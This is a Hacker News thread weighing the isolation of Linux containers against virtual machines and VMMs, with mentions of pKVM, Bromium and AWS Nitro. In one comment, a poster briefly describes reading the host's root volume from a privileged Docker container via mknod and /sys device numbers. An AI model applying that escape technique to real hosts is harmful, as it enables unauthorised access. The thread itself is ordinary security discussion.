Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

You cannot build a secure virtualization runtime because underlying it is the VMM. Until you have a secure VMM you are subject to precisely the same class of problems plaguing container runtimes.

The only meaningful difference is that Linux containers target partitioning Linux kernel services which is a shared-by-default/default-allow environment that was never designed for and has never achieved meaningful security. The number of vulnerabilities resulting from, "whoopsie, we forgot to partition shared service 123" would be hilarious if it were not a complete lapse of security engineering in a product people are convinced is adequate for security-critical applications.

Present a vulnerability assessment demonstrating a team of 10 with 3 years time (~10-30 M$, comparable to many commercially-motivated single-victim attacks these days) can find no vulnerabilities in your deployment or a formal proof of security and correctness otherwise we should stick with the default assumption that software if easily hacked instead of the extraordinary claim that demands extraordinary evidence.



> You cannot build a secure virtualization runtime because underlying it is the VMM

There are VMMs (e.g. pKVM in upstream Linux) with small SLoC that are isolated by silicon support for nested virtualization. This can be found on recent Google Pixel phones/tablets with strong isolation of untrusted Debian Arm Linux "Terminal" VM.

A similar architecture was shipped a decade ago by Bromium and now on millions of HP business laptops, including hypervisor isolation of firmware, "Hypervisor Security : Lessons Learned — Ian Pratt, Bromium — Platform Security Summit 2018", https://www.youtube.com/watch?v=bNVe2y34dnM

Christian Slater, HP cybersecurity ("Wolf") edutainment on nested virt hypervisor in printers, https://www.youtube.com/watch?v=DjMSq3n3Gqs


> silicon support for nested virtualization

Is there any guarantee that this "silicon support" is any safer than the software? Once we break the software abstraction down far enough it's all just configuring hardware. Conversely, once you start baking significant complexity into hardware (such as strong security boundaries) it would seem like hardware would be subject to exactly the same bugs as software would, except it will be hard to update of course.


> Is there any guarantee that this "silicon support" is any safer than the software?

Safety and security claims are only meaningful in the context of threat models. As described in the Xen/uXen/AX video, pKVM and AWS Nitro security talks, one goal is to reduce the size, function and complexity of open-source code running at the highest processor privilege levels [1], minimizing dependency on closed firmware/SMM/TrustZone. Nitro moved some functions (e.g. I/O virtualization) to separate processors, e.g. SmartNIC/DPU. Apple used an Arm T2 secure enclave processor for encryption and some I/O paths, when their main processor was still x86. OCP Caliptra RoT requires OSS firmware signed by both the OEM and hyperscaler customer. It's a never-ending process of reducing attack surface, prioritized by business context.

> hardware would be subject to exactly the same bugs as software would, except it will be hard to update of course

Some "hardware" functions can be updated via microcode, which has been used to mitigate speculative execution vulnerabilities, at the cost of performance.

[1] https://en.wikipedia.org/wiki/Protection_ring

[2] https://en.wikipedia.org/wiki/Transient_execution_CPU_vulner...


While VMs do have an attack surface, it is vastly different than containers, which as you pointed out are not really a security system, but simply namespaces.

Seacomp, capabilities, selinux, apparmor, etc.. can help harden containers, but most of the popular containers don't even drop root for services, and I was one of the people who tried to even get Docker/Moby etc.. to let you disable the privileged flag...which they refused to do.

While some CRIs make this easier, any agent that can spin up a container should be considered a super user.

With the docker --privlaged flag I could read the hosts root volume or even install efi bios files just using mknod etc, walking /sys to find the major/minor numbers.

Namespaces are useful in a comprehensive security plan, but as you mentioned, they are not jails.

It is true that both VMs and containers have attack surfaces, but the size of the attack surface on containers is much larger.


I see your point but even if your VMM is a zillion lines of C++ with emulated devices there are opportunities to secure it that don't exist with a shared-monolithic-kernel container runtime.

You can create security boundaries around (and even within!) the VMM. You can make it so an escape into the VMM process has only minimal value, by sandboxing the VMM aggressively.

Plus you can absolutely escape the model of C++ emulating devices. Ideally I think VMMs should do almost nothing but manage VF passthroughs. Of course then we shift a lot of the problem onto the inevitably completely broken device firmware but again there are more ways to mitigate that than kernel bugs.


Could you elaborate on how you could secure those architectures better? It's unclear to me how being in device firmware or being a VMM provides you with any further abilities. Surely you still have the same fundamental problem of being a shared resource.

Intuitively there are differences. The Linux kernel is fucking huge, and anything that could bake the "shared resources" down to less than the entire kernel would be easier to verify, but that would also be true for an entirely software based abstraction inside the kernel.

In a way it's the whole micro kernel discussion again.


When you escape a container generally you can do whatever the kernel can do. There is no further security boundary.

If you escape into a VMM you can do whatever the VMM can do. You can build a system where it can not do very much more than the VM guest itself. By the time the guest boots the process containing the vCPU threads has already lost all its interesting privileges and has no credentials of value.

Similar with device passthrough. It's not very interesting if the device you're passing through ultimately has unchecked access to PCIe but if you have a proper ioMMU set up it should be possible to have a system where pwning the device firmware is just a small step rather than an immediate escalation to root-equivalent. (I should say, I don't know if this system actually exists today, I just know it's possible).

With a VMM escape your next step is usually to exploit the kernel. But if you sandbox the VMM properly there is very limited kernel attack surface available to it.

So yeah you're right it's similar to the microkernel discussion. You could develop these properties for a shared-kernel container runtime... By making it a microkernel.

It's just that isn't a path with any next steps in the real world. The road from Docker to a secure VM platform is rich with reasonable incremental steps forward (virtualization is an essential step but it's still just one of many). The road from Docker to a microkernel is... Rewrite your entire platform and every workload!


> It's just that isn't a path with any next steps in the real world.

It appears we find ourselves at the Theory/Praxis intersection once again.

> The road from Docker to a secure VM platform is rich with reasonable incremental steps forward

The reason it seems so reasonable is that it's well trodden. There were an infinity of VM platforms before Docker, and they were all discarded for pretty well known engineering reasons mostly to do with performance, but also for being difficult for developers to reason about. I have no doubt that there's still dialogue worth having between those two approaches, but cgroups isn't a "failed" VM security boundary anymore than Linux is a failed micro kernel. It never aimed to be a VM-like security boundary.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: